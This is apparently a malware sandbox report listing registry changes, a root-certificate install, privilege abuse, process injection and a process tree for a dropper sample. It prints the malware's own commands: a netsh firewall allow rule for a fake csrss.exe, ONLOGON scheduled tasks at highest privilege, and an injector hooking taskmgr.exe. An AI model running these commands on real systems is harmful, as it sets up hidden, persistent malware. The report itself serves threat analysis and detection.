Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	Conhost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SYSTEM\CurrentControlSet\Control\NetTrace	netsh.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	rundll32.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	rundll32.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	Conhost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2532 = "Chatham Islands Standard Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-492 = "India Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-141 = "Canada Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	ZWaNCawf3dZ4eT3o5QvqYRLW.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4	zhqw0x5VEifunzipVxSGz3iI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 04000000010000001000000078f2fcaa601f2fb4ebc937ba532e75490f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e4190000000100000010000000ffac207997bb2cfe865570179ee037b92000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	zhqw0x5VEifunzipVxSGz3iI.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 5c000000010000000400000000100000190000000100000010000000ffac207997bb2cfe865570179ee037b9030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e41d0000000100000010000000a86dc6a233eb339610f3ed414927c559140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac899880b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e199604000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e	zhqw0x5VEifunzipVxSGz3iI.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
696	EWJZ39UCGs8aWbGUePjQcrz2.exe
696	EWJZ39UCGs8aWbGUePjQcrz2.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
3268	powershell.exe
3268	powershell.exe
3268	powershell.exe
3268	powershell.exe
3252	powershell.exe
3252	powershell.exe
520	powershell.exe
520	powershell.exe
520	powershell.exe
3252	powershell.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
3820	powershell.EXE
3820	powershell.EXE
3820	powershell.EXE
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
520	powershell.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
4544	Qw369efixtIBKFp9ZFZ0w0mq.exe
3252	powershell.exe
3820	powershell.EXE
4372	updater.exe
4372	updater.exe
4528	powershell.exe
4528	powershell.exe
4528	powershell.exe
4528	powershell.exe
4704	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4704	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
1124	FcrfIQnc3MnN2EYixmyTFb6D.exe
1124	FcrfIQnc3MnN2EYixmyTFb6D.exe
1584	powershell.exe
1584	powershell.exe
4928	powershell.exe
4928	powershell.exe
1584	powershell.exe
4928	powershell.exe
1584	powershell.exe
4928	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4868	powershell.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4328	cmd.exe
4328	cmd.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
596	powershell.exe
596	powershell.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
4496	ZWaNCawf3dZ4eT3o5QvqYRLW.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
628	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	3748	InstallUtil.exe
Token: SeDebugPrivilege	1384	mAIqaeuuMoGky7kZVzMJ1DQQ.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	3252	powershell.exe
Token: SeDebugPrivilege	520	powershell.exe
Token: SeIncreaseQuotaPrivilege	3268	powershell.exe
Token: SeSecurityPrivilege	3268	powershell.exe
Token: SeTakeOwnershipPrivilege	3268	powershell.exe
Token: SeLoadDriverPrivilege	3268	powershell.exe
Token: SeSystemProfilePrivilege	3268	powershell.exe
Token: SeSystemtimePrivilege	3268	powershell.exe
Token: SeProfSingleProcessPrivilege	3268	powershell.exe
Token: SeIncBasePriorityPrivilege	3268	powershell.exe
Token: SeCreatePagefilePrivilege	3268	powershell.exe
Token: SeBackupPrivilege	3268	powershell.exe
Token: SeRestorePrivilege	3268	powershell.exe
Token: SeShutdownPrivilege	3268	powershell.exe
Token: SeDebugPrivilege	3268	powershell.exe
Token: SeSystemEnvironmentPrivilege	3268	powershell.exe
Token: SeRemoteShutdownPrivilege	3268	powershell.exe
Token: SeUndockPrivilege	3268	powershell.exe
Token: SeManageVolumePrivilege	3268	powershell.exe
Token: 33	3268	powershell.exe
Token: 34	3268	powershell.exe
Token: 35	3268	powershell.exe
Token: 36	3268	powershell.exe
Token: SeDebugPrivilege	3820	powershell.EXE
Token: SeShutdownPrivilege	196	powercfg.exe
Token: SeCreatePagefilePrivilege	196	powercfg.exe
Token: SeShutdownPrivilege	3104	powercfg.exe
Token: SeCreatePagefilePrivilege	3104	powercfg.exe
Token: SeShutdownPrivilege	592	powercfg.exe
Token: SeCreatePagefilePrivilege	592	powercfg.exe
Token: SeShutdownPrivilege	4908	assistant_installer.exe
Token: SeCreatePagefilePrivilege	4908	assistant_installer.exe
Token: SeDebugPrivilege	4528	powershell.exe
Token: SeDebugPrivilege	4704	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Token: SeImpersonatePrivilege	4704	ZWaNCawf3dZ4eT3o5QvqYRLW.exe
Token: SeAssignPrimaryTokenPrivilege	4528	powershell.exe
Token: SeIncreaseQuotaPrivilege	4528	powershell.exe
Token: SeSecurityPrivilege	4528	powershell.exe
Token: SeTakeOwnershipPrivilege	4528	powershell.exe
Token: SeLoadDriverPrivilege	4528	powershell.exe
Token: SeSystemtimePrivilege	4528	powershell.exe
Token: SeBackupPrivilege	4528	powershell.exe
Token: SeRestorePrivilege	4528	powershell.exe
Token: SeShutdownPrivilege	4528	powershell.exe
Token: SeSystemEnvironmentPrivilege	4528	powershell.exe
Token: SeUndockPrivilege	4528	powershell.exe
Token: SeManageVolumePrivilege	4528	powershell.exe
Token: SeDebugPrivilege	1124	FcrfIQnc3MnN2EYixmyTFb6D.exe
Token: SeImpersonatePrivilege	1124	FcrfIQnc3MnN2EYixmyTFb6D.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	4928	powershell.exe
Token: SeDebugPrivilege	4868	powershell.exe
Token: SeDebugPrivilege	596	powershell.exe
Token: SeDebugPrivilege	4228	powershell.exe
Token: SeDebugPrivilege	1028	rundll32.EXE
Token: SeDebugPrivilege	432	powershell.exe
Token: SeShutdownPrivilege	2260	powercfg.exe
Token: SeCreatePagefilePrivilege	2260	powercfg.exe
Token: SeShutdownPrivilege	3528	powercfg.exe
Token: SeCreatePagefilePrivilege	3528	powercfg.exe
Token: SeShutdownPrivilege	3332	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3792 wrote to memory of 3748	3792	85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe	70
PID 3748 wrote to memory of 4704	3748	InstallUtil.exe	71
PID 3748 wrote to memory of 4704	3748	InstallUtil.exe	71
PID 3748 wrote to memory of 4704	3748	InstallUtil.exe	71
PID 3748 wrote to memory of 1124	3748	InstallUtil.exe	73
PID 3748 wrote to memory of 1124	3748	InstallUtil.exe	73
PID 3748 wrote to memory of 1124	3748	InstallUtil.exe	73
PID 3748 wrote to memory of 4544	3748	InstallUtil.exe	72
PID 3748 wrote to memory of 4544	3748	InstallUtil.exe	72
PID 3748 wrote to memory of 1384	3748	InstallUtil.exe	74
PID 3748 wrote to memory of 1384	3748	InstallUtil.exe	74
PID 3748 wrote to memory of 1384	3748	InstallUtil.exe	74
PID 3748 wrote to memory of 1204	3748	InstallUtil.exe	75
PID 3748 wrote to memory of 1204	3748	InstallUtil.exe	75
PID 3748 wrote to memory of 1204	3748	InstallUtil.exe	75
PID 3748 wrote to memory of 696	3748	InstallUtil.exe	76
PID 3748 wrote to memory of 696	3748	InstallUtil.exe	76
PID 3748 wrote to memory of 696	3748	InstallUtil.exe	76
PID 1204 wrote to memory of 748	1204	zhqw0x5VEifunzipVxSGz3iI.exe	77
PID 1204 wrote to memory of 748	1204	zhqw0x5VEifunzipVxSGz3iI.exe	77
PID 1204 wrote to memory of 748	1204	zhqw0x5VEifunzipVxSGz3iI.exe	77
PID 1204 wrote to memory of 4908	1204	zhqw0x5VEifunzipVxSGz3iI.exe	78
PID 1204 wrote to memory of 4908	1204	zhqw0x5VEifunzipVxSGz3iI.exe	78
PID 1204 wrote to memory of 4908	1204	zhqw0x5VEifunzipVxSGz3iI.exe	78
PID 1204 wrote to memory of 4940	1204	zhqw0x5VEifunzipVxSGz3iI.exe	79
PID 1204 wrote to memory of 4940	1204	zhqw0x5VEifunzipVxSGz3iI.exe	79
PID 1204 wrote to memory of 4940	1204	zhqw0x5VEifunzipVxSGz3iI.exe	79
PID 4940 wrote to memory of 4272	4940	zhqw0x5VEifunzipVxSGz3iI.exe	80
PID 4940 wrote to memory of 4272	4940	zhqw0x5VEifunzipVxSGz3iI.exe	80
PID 4940 wrote to memory of 4272	4940	zhqw0x5VEifunzipVxSGz3iI.exe	80
PID 3748 wrote to memory of 2856	3748	InstallUtil.exe	82
PID 3748 wrote to memory of 2856	3748	InstallUtil.exe	82
PID 3748 wrote to memory of 2856	3748	InstallUtil.exe	82
PID 2856 wrote to memory of 2816	2856	NjD3wZxeeWlSx5eQJUW3XsQg.exe	83
PID 2856 wrote to memory of 2816	2856	NjD3wZxeeWlSx5eQJUW3XsQg.exe	83
PID 2856 wrote to memory of 2816	2856	NjD3wZxeeWlSx5eQJUW3XsQg.exe	83
PID 2816 wrote to memory of 4364	2816	Install.exe	84
PID 2816 wrote to memory of 4364	2816	Install.exe	84
PID 2816 wrote to memory of 4364	2816	Install.exe	84
PID 4364 wrote to memory of 1300	4364	Install.exe	94
PID 4364 wrote to memory of 1300	4364	Install.exe	94
PID 4364 wrote to memory of 1300	4364	Install.exe	94
PID 4364 wrote to memory of 3576	4364	Install.exe	86
PID 4364 wrote to memory of 3576	4364	Install.exe	86
PID 4364 wrote to memory of 3576	4364	Install.exe	86
PID 1300 wrote to memory of 1268	1300	forfiles.exe	87
PID 1300 wrote to memory of 1268	1300	forfiles.exe	87
PID 1300 wrote to memory of 1268	1300	forfiles.exe	87
PID 3576 wrote to memory of 4568	3576	forfiles.exe	92
PID 3576 wrote to memory of 4568	3576	forfiles.exe	92
PID 3576 wrote to memory of 4568	3576	forfiles.exe	92
PID 1268 wrote to memory of 4612	1268	cmd.exe	91
PID 1268 wrote to memory of 4612	1268	cmd.exe	91
PID 1268 wrote to memory of 4612	1268	cmd.exe	91
PID 1268 wrote to memory of 592	1268	cmd.exe	88
PID 1268 wrote to memory of 592	1268	cmd.exe	88
PID 1268 wrote to memory of 592	1268	cmd.exe	88

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3116
- C:\Users\Admin\AppData\Local\Temp\85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe
  "C:\Users\Admin\AppData\Local\Temp\85c7ebf244cb05f624baea0b1526c57ba3ecaa05583c27fe814217f9ffbf020c.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:3792
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
    3⤵
    - Drops startup file
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:3748
  - - C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe
      "C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:520
    - - C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe
        
        "C:\Users\Admin\Pictures\ZWaNCawf3dZ4eT3o5QvqYRLW.exe"
        5⤵
        Windows security bypass
        Executes dropped EXE
        Windows security modification
        Adds Run key to start application
        Checks for VirtualBox DLLs, possible anti-VM trick
        Drops file in Windows directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        
        PID:4496
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1584
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:3428
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        
        PID:3016
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:4228
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious use of AdjustPrivilegeToken
        
        PID:432
      - C:\Windows\rss\csrss.exe
        
        C:\Windows\rss\csrss.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        Manipulates WinMonFS driver.
        Drops file in Windows directory
        
        PID:1344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4500
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:3156
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn ScheduledUpdate /f
        7⤵
        
        PID:4296
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1288
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:4152
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        7⤵
        
        PID:2240
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
        7⤵
        Executes dropped EXE
        
        PID:4252
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:4076
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
        7⤵
        Creates scheduled task(s)
        
        PID:3396
        
        C:\Windows\windefender.exe
        
        "C:\Windows\windefender.exe"
        7⤵
        Executes dropped EXE
